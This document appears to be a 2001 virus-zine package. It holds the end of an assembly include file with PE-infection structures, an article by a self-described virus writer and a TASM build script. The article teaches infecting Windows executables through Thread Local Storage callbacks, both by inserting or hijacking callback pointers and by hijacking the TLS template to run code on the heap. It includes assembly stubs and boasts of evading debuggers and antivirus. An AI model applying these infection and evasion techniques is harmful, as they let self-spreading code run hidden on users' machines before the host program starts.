mzreloff dw ? ;18 mzfiller db 22h dup (?) ;1A mzlfanew dd ? ;3C mzhdr ends pesect struct sectname db 8 dup (?) sectvirtsize dd ? sectvirtaddr dd ? sectrawsize dd ? sectrawaddr dd ? sectreladdr dd ? sectlineaddr dd ? sectrelcount dw ? sectlinecount dw ? sectflags dd ? pesect ends mapsehstk struct mapsehprev dd ? mapsehexcpt dd ? mapsehregs dd 8 dup (?) mapsehsehret dd ? mapsehinfret dd ? mapsehstk ends mapstack struct mapfilesize dd ? mapmapret dd ? mapinfret dd ? mapattrib dd ? mapstack ends infectstk struct infdelta dd ? infmapview dd ? inffilesize dd ? infseh mapsehstk infectstk ends align ;restore default alignment ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SHRUG.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TLS.TXT]ÄÄÄ Thread Local Storage The hidden entry point roy g biv / defjam -= defjam =- since 1992 bringing you the viruses of tomorrow today! Prologue: Please excuse my English. I'm still learning. About the author: Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of the world's first XMS swapping virus (John Galt, coded by RTFishel in 1995, only 30 bytes stub, the rest is swapped out). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. This is my first virus for Win32. It is the world's first virus using Thread Local Storage for replication. It took me a week to design it and a whole day to write it. I'm also available for joining a group. Just in case anyone is interested. ;) What is Thread Local Storage? This is what Microsoft has to say about it: "The .tls section provides direct PE/COFF support for static Thread Local Storage (TLS). TLS is a special storage class supported by Windows NT. To support this programming construct, the PE/COFF .tls section specifies the following information: initialization data, callback routines for per-thread initialization and termination, and the TLS index". So, Thread Local Storage (TLS) is a Microsoft invention for applications that need to initialise thread data before main execution begins. To do this, there are callback pointers. These functions execute before the code at the main entry point! To prove that, load my example code into any debugger and see what happens. Ho ho, we even fool SoftIce for NT, the god of debuggers. Clearly, this is a new way for viruses to run and probably the AVers don't know about it yet, or if they do then they don't support it because no viruses use it (maybe they said that about NTFS alternative streams too). Some points now: We can ignore the reference to .tls because there is a field in the PE header that points to this structure anywhere in the file. Unfortunately, it's true that it works only under Windows NT/2000/XP. Under Windows 9x/Me, simply nothing happens and those functions never receive control. At least it doesn't crash. :) Also, NT/2000/XP require import section that imports dll that uses kernel32 APIs, else a page fault occurs. This appears to be a bug. The callback functions have the same parameters as a DLL entry-point function, except that nothing is returned. The declaration looks like this: typedef VOID (NTAPI *PIMAGE_TLS_CALLBACK) (PVOID DllHandle, DWORD Reason, PVOID Reserved); This means that there are three parameters on the stack, so TLS functions must use RET 000Ch on exit. The Reason parameter can take the following values: Setting Value Description DLL_PROCESS_ATTACH 1 New process has started DLL_THREAD_ATTACH 2 New thread has been created DLL_THREAD_DETACH 3 Thread is about to be terminated DLL_PROCESS_DETACH 0 Process is about to terminate The DLL_PROCESS_ATTACH and DLL_PROCESS_DETACH messages mean that we are called for the host startup (after CreateProcess() but before process entry point) and shutdown (from within ExitProcess()), and the DLL_THREAD_ATTACH and DLL_THREAD_DETACH mean that we are called for thread startup (after CreateThread() but before thread entry point) and shutdown (from within ExitThread()). This happens for EXEs and also DLLs (but only DLLs that are not loaded with LoadLibrary). No need to hook ExitProcess() anymore because we will be called by ExitProcess() automatically. It is important to know that NTDLL.DLL (not KERNEL32.DLL!) calls the callback functions, and that kernel32.dll is not in the SEH chain when the ATTACH messages are sent, only when the DETACH messages are sent. Thus, if you need to call kernel32.dll APIs from an ATTACH message, then you cannot use a SEH walker to find kernel32.dll image base. The good thing is that the import table is filled already, so you can use the host imports. What does TLS look like? At offset 0xC0 in the PE header is the pointer to the TLS directory. According to Microsoft documentation, the TLS directory has the format: Offset Size Field Description 0x00 4 Raw Data Start VA Starting address of the TLS template 0x04 4 Raw Data End VA Address of last byte of TLS template 0x08 4 Address of Index Location to receive the TLS index 0x0C 4 Address of Callbacks Pointer to array of TLS callbacks 0x10 4 Size of Zero Fill Size of unused data in TLS template 0x14 4 Characteristics (reserved but not checked) Notice that the pointers are all virtual addresses (VA), not relative virtual addresses (RVA). This means that if we add a TLS directory, we should also add relocation items to the .reloc section, or simply remove all relocations. The reason for this is that if the file is loaded to a different base address, then Windows NT/2000 will display the message box "The application failed to initialize correctly" and the file will not execute anymore. What do the TLS fields mean? The TLS template contains data that are copied whenever a thread is created. These data can also be executable codes. If the template exists (it is optional and so the fields can be null) then when the application starts, Windows will allocate an array for the TLS pointers and store this pointer at fs:0x2c. For each thread that is created, the size of the template is allocated from the local heap, the data are copied to there, the pointer is stored in the array, and the array index is stored in the TLS index field. A thread can get its pointer by this formula: dword at (dword at fs:[0x2c] + (TLS index * 4)) Or some code: mov eax, dword ptr fs:[2ch] ;get pointer to array of TLS pointers mov ecx, dword ptr [offset TLSIndex] ;get TLS index mov eax, dword ptr [ecx * 4 + eax] ;get pointer to TLS data then access data at [eax + offset] The Address of Callbacks field contains the Virtual Address of an null- terminated array of functions that receive the ATTACH/DETACH messages. It is valid to have no entries in this array. In that case, the field is supposed to point to four zero bytes, however the actual field can also be null. How to use TLS? There are a few simple ways to use TLS to infect a file: add a callback pointer to existing array (or create new array) alter one of the host callback pointers alter the code in one of the callbacks create a new TLS directory hijack the TLS template and alter some code somewhere in the file If you want to use the TLS method to infect a file, firstly check if a TLS directory exists already. If it does, then you can pick at random a callback routine pointer and change it to point to your code. If there is no existing TLS directory, then add one by setting correctly the pointers in your own version. The template addresses can be set to null and the index pointer can point to any writable dword (including the Characteristics field because it is not used). The callback pointer will point to the array of callback routine pointers, one of which will be the virus entry point. When this entry point receives control, the file is loaded fully into memory and the import table is fixed up. This means that we can do anything that we would do normally, like go resident or call API functions and spread to other files. The main difference is that we are guaranteed to be called at least twice, once on startup and once on shutdown, and twice more for every thread that the host uses. This means that we must be careful to avoid recursion because we will also be called if we use threads in our virus code. Hijacking the TLS template is a technique that I discovered some time later during my research. The idea is to make a copy of the TLS template and add the virus code to it. When the process starts (or a thread is created), then the virus code is copied by Windows into the heap. This means that the code is automatically placed into a executable and writable memory space, without any call to malloc or memcopy. The only thing that is required after that is to transfer control to the code on the heap. That is done by using the TLS index to get the heap pointer. The transfer of control code would look something like this: this code is in the file: fib: push eax push ecx mov eax, dword ptr fs:[2ch] mov ecx, dword ptr [offset tls_index] mov eax, dword ptr [ecx * 4 + eax] add eax, size of original TLS template call eax fie: this code is on the heap: pop eax ;get return address pop ecx ;restore original ecx sub eax, fie - fib ;point to first byte of code in file xchg eax, [esp] ;store real return address and restore original eax pushad ;now save all original registers ;rest of code is here. do not forget to restore host bytes popad ;restore all registers ret ;return to host Epilogue: Now you want to look at my example code and then to make your own examples. There are many possibilities with this technique that make it very interesting. It is easy when you know how. Just use your imagination. TLSDemo1 has an inserted TLS directory and code that displays message box. This code runs before main entry point. TLSDemo2 has a hijacked TLS template and code that displays message box. This code jumps from main entry point to heap without malloc or memcopy. Greets to the old Defjam crew: Prototype, RTFishel, Obleak, and The Gingerbread Man rgb/dj jan 2001 iam_rgb@hotmail.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TLS.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ @echo off if %1.==. goto usage %tasm32%\bin\tasm32 /r /ml /m9 /os /p /q /w2 /zn %1 if errorlevel 1 goto end %tasm32%\bin\tlink32 /c /B:400000 /Tpe /aa /x /n %1.obj,,,%tasm32%\lib\import32.lib, del %1.obj goto end :usage echo. echo Usage: MAKE filename echo eg. MAKE SHRUG echo requires %tasm32% set to TASM directory (eg C:\TASM) :end echo. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ